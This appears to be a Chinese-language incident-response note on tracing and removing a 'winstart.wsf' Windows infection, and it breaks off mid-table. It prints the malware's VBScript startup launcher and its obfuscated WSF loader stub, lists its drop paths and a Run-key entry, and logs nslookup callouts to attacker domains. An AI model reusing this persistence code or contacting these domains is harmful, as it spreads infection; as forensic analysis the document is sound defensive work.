0x00 背景
发现感染了winstart.wsf 病毒如何清理。
0x01 现象
遍历Users下每个目录以及C:\和C:\Windows\Temp 2个目录写入病毒文件。
C:\Users\Administrator\AppData\Local\Temp\winstart.wsf
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf
C:\Users\userA\AppData\Local\Temp\winstart.wsf
C:\Users\userA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf
C:\Users\Default\AppData\Local\Temp\winstart.wsf (我将Temp完整文件夹删除后不再创建,Temp\winstart.wsf Temp\Temp.Temp)
C:\autoexec.wsf
C:\Windows\Temp\winstart.wsf
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf内容如下
<job> <objectid="w"progid="WScript.Shell"/>
<scriptlanguage="VBScript">
tempPath = w.expandenvironmentstrings("%TEMP%") & "\winstart.wsf" homeDrivePath = w.expandenvironmentstrings("%HOMEDRIVE%") & "\autoexec.wsf"
homePath = w.expandenvironmentstrings("%HOME%") & "\winstart.wsf"
w.run "wscript.exe //B " & Chr(34) & tempPath & Chr(34)
w.run "wscript.exe //B " & Chr(34) & homeDrivePath & Chr(34)
w.run "wscript.exe //B " & Chr(34) & homePath & Chr(34)
</script> </job>
%TEMP%\winstart.wsf内容如下
PNG<job id="EYPGTeN"><script language="VBScript" src="TMP.TMP">eval("ex"&"ecut"&"e(EYPGTeNeXe)=1")</Script></job>
%HOMEDRIVE%\autoexec.wsf
PNG<job id="EYPGTeN"><script language="VBScript" src="TMP.TMP">eval("ex"&"ecut"&"e(EYPGTeNeXe)=1")</Script></job>
%HOME%\winstart.wsf
PNG<job id="EYPGTeN"><script language="VBScript" src="TMP.TMP">eval("ex"&"ecut"&"e(EYPGTeNeXe)=1")</Script></job>
以上文件删除之后重新覆盖生成。
0x02 排查
通过wmi 定位子程序和父程序:
wmic process where "name='wscript.exe'" get processid,ParentProcessId,commandline
有2个程序
| commandline | ParentProcessId | ParentProcessId |
| "C:\Windows\System32\wscript.exe" //B "C:\Windows\TEMP\winstart.wsf" | 6208 | 5496 |
| "C:\Windows\System32\wscript.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf" | 11372 | 14188 |
6208父进程无法在任务管理器看到 (可能是启动完父进程就结束了)
用processmon 抓包 Process Name: wscript.exe Operation: Process Create
有dns出网行为
| Process Name | Operation | Path | Detail |
| wscript.exe | Process Create | C:\Windows\System32\cmd.exe | PID: 8984, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.airobotheworld.com>>C:\Windows\TEMP\~cmdscript.tmp |
| wscript.exe | Process Create | C:\Windows\System32\cmd.exe | PID: 12140, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.aigoingtokill.club>>C:\Windows\TEMP\~cmdscript.tmp |
| wscript.exe | Process Create | C:\Windows\System32\cmd.exe | PID: 11084, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.6cs6.club>>C:\Windows\TEMP\~cmdscript.tmp |
Process Name: scrcons.exe Operation: Process Create
| Process Name | Operation | Path | Detail |
| scrcons.exe | Process Create | C:\Windows\System32\wscript.exe | PID: 912, Command line: "C:\Windows\System32\wscript.exe" //B "C:\Windows\TEMP\winstart.wsf" |
进程链:
svchost.exe -> scrcons.exe -> wscript.exe
1).scrcons.exe 进程动作
(向很多目录写wsf文件,遍历Users下每个目录以及C:\和C:\Windows\Temp 2个目录):
C:\Users\Administrator\AppData\Local\Temp\winstart.wsf
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf
C:\Users\userA\AppData\Local\Temp\winstart.wsf
C:\Users\userA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.wsf
C:\Users\Default\AppData\Local\Temp\winstart.wsf (我将Temp完整文件夹删除后不再创建,Temp\winstart.wsf Temp\Temp.Temp)
C:\autoexec.wsf
C:\Windows\Temp\TMP.TMP
C:\Windows\Temp\winstart.wsf
同时写注册表:winstart
winstart.wsf 内容:
PNG<job id="oesDllY"><script language="VBScript" src="TMP.TMP">eval("ex"&"ecut"&"e(oesDllYeXe)=1")</Script></job>
2).wscript.exe 进程动作:
PID: 8984, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.airobotheworld.com>>C:\Windows\TEMP\~cmdscript.tmp
PID: 12140, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.aigoingtokill.club>>C:\Windows\TEMP\~cmdscript.tmp
PID: 11084, Command line: "C:\Windows\System32\cmd.exe" /c nslookup a1.6cs6.club>>C:\Windows\TEMP\~cmdscript.tmp
2.1.检查开机启动项:
任务管理器-启动- 查看启动项
发现有开机启动项 wscript.exe
kill任务管理器中 wscript.exe
wmic process where "name='wscript.exe'" get processid,ParentProcessId,commandline
CommandLine ParentProcessId ProcessId
没有可用实例
删除注册表中
计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winstart键值 失败
猜测 scrcons.exe 被注入进程,执行 WriteFile (后重启无效,方向错误)
执行的动作是遍历Users下每个目录以及C:\和C:\Windows\Temp 2个目录:
AppData\Local 和 AppData\Roaming 主要区别:
| 特性 | AppData\Local | AppData\Roaming |
| 数据范围 | 本地计算机相关 | 用户 |